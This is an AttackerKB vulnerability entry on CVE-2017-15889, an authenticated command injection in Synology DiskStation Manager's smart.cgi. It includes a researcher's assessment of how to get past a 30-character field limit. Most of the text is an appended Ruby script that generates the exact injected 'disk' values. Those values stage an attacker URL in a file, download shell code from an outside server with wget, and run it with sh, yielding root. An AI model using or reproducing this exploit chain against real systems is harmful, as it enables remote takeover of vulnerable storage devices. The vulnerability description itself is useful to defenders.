AttackerKB AKB:BF9F05BB-F460-4011-9752-07B39F64D863
Dec 04, 2017 - 12:00 a.m.

CVE-2017-15889

attackerkb.com

EPSS: 0.119 (Low), percentile 95.4%

Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via the disk field.

Recent assessments:

h00die at May 20, 2020 12:19pm UTC reported:

AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi through either a GET or POST request.
Variables for the request look as such:

        # request variables, sent by either GET or POST
        vars = {
          'action'    => 'apply',
          'operation' => 'quick',
          'disk'      => "/dev/sda"
        }

The disk field is vulnerable. However, that's just where the fun begins. The disk field is required to be 'semi' disk correct. AKA you can't just have nothing there, or a; however /dev/sd did seem to work. Next, when the command is passed off, the entire disk field is limited to 30 characters. After shortening to /dev/sd and then adding ticks (`) you are left with 22 characters. Pretty tight spacing.

To circumvent this restriction, the following was done:

  1. in < 22 characters, echo -n an ip:port to a file (/a).

  2. use wget -i /a -O <file> to then pull back shell code from an attacker controlled HTTP server

  3. execute the payload

Most likely step 1 will need to be done in more than one step.

Exploitation grants root privileges.

Assessed Attacker Value: 5
Assessed Exploitability: 2
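The staging procedure described in the assessment above, as an added example that is not from the AttackerKB post or from any Metasploit module: given the constraints the assessment quotes (the field must look like a disk, the whole field is cut at 30 characters, the injected command sits in backticks), it produces the ordered list of disk values an authenticated attacker would send, one per request. The attacker address 192.168.1.10:8080/p, the scratch files /a and /b, running the fetched file with sh, and the 21-character budget (derived directly from 30 minus /dev/sd minus two ticks, one less than the post's count) are assumptions of this example.

```ruby
# Added example, not code from the AttackerKB post or from any Metasploit
# module. Builds the per-request 'disk' values needed to push a payload
# through the 30-character limit described in the assessment. Attacker
# address, scratch file names and the final `sh` step are assumptions.

DISK_PREFIX = '/dev/sd'   # shortest value the CGI still treats as a disk
DISK_LIMIT  = 30          # characters kept from the disk field

# Characters left for the injected command once the prefix and the two
# backticks are in place (21 here; the post counts 22, we keep one spare).
def command_budget(limit = DISK_LIMIT, prefix = DISK_PREFIX)
  limit - prefix.length - 2
end

# Wrap one shell command in backticks behind the disk prefix, refusing
# anything the 30-character cut would silently truncate.
def disk_field(cmd, limit: DISK_LIMIT, prefix: DISK_PREFIX)
  if cmd.length > command_budget(limit, prefix)
    raise ArgumentError, "#{cmd.inspect} exceeds the #{command_budget(limit, prefix)}-char budget"
  end
  "#{prefix}`#{cmd}`"
end

# Step 1: write `text` to `path` with echo -n, split into as many chunks
# as the budget forces (first write truncates the file, later ones append).
def echo_chunks(text, path, limit: DISK_LIMIT, prefix: DISK_PREFIX)
  # Only plain URL characters: anything else would need shell quoting,
  # and quotes cost characters we do not have.
  raise ArgumentError, "unsafe characters in #{text.inspect}" unless text.match?(%r{\A[\w.:/-]+\z})
  cmds = []
  rest = text.dup
  until rest.empty?
    # A blank before the redirect keeps a chunk like "10" from being read
    # as a file-descriptor number ("10>>/a" would redirect fd 10 instead).
    redirect = cmds.empty? ? " >#{path}" : " >>#{path}"
    room = command_budget(limit, prefix) - 'echo -n '.length - redirect.length
    raise ArgumentError, 'no room left for a chunk' if room < 1
    cmds << "echo -n #{rest.slice!(0, room)}#{redirect}"
  end
  cmds
end

# Steps 1-3 chained: stage the URL, fetch the script with wget -i, run it.
def staged_commands(url, url_file: '/a', script: '/b')
  echo_chunks(url, url_file) +
    ["wget -i #{url_file} -O #{script}",
     "sh #{script}"]
end

# Every request's disk field, in send order.
def disk_fields(url, **opts)
  staged_commands(url, **opts).map { |c| disk_field(c) }
end

if __FILE__ == $PROGRAM_NAME
  disk_fields('192.168.1.10:8080/p').each { |f| puts f }
end
```

Each printed line is one value for the disk variable in the request shown in the assessment; for the 19-character address above the URL needs three echo requests, followed by one for wget and one for sh, all exactly at or under the 30-character cut.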
